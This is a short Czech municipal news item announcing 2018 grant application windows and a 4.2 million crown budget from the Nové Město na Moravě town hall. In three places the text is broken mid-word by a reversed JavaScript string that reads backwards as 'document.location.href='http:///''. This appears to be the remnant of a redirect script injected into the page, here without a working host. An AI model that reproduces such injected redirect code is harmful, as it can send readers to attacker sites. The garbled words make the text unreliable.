Rainbow page separator

V prvním termínu je možné o dotační peníze žádat do 11. září

Středa, 9. srpna 2017

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Až do 11. září mohou zájemci podávat žádosti o dotace, které vypsala novoměstská radnice. Jedná se
výzvu na podporu aktivit neziskových právnických osob v oblasti kultury, ochrany přírody a krajiny, volného času a malých spolků v oblasti sportu a výzvu na podporu aktivit neziskových právnických osob v sociální oblasti. Žádosti je možné zasílat do podatelny městského úřadu, případně elektronicky prostřednictvím da[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové schránky.
Od 25. září do 25. října pak lidé mohou žádat o peníze města při výzvě pro mimořádné počiny, výzvě na podporu aktivit neziskových právnických osob v oblasti sportu a tělovýchovy s členskou základnou 150 a více členů a také v dotačních programech s názvy Sportujeme pro radost, Zkvalitnění spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovišť, Novoměstská kultura a Pomoc a podpora osobám v nepříznivé sociální situaci.
Celková finanční částka určená na dotační podporu v roce 2018 činí 4,2 milionu korun.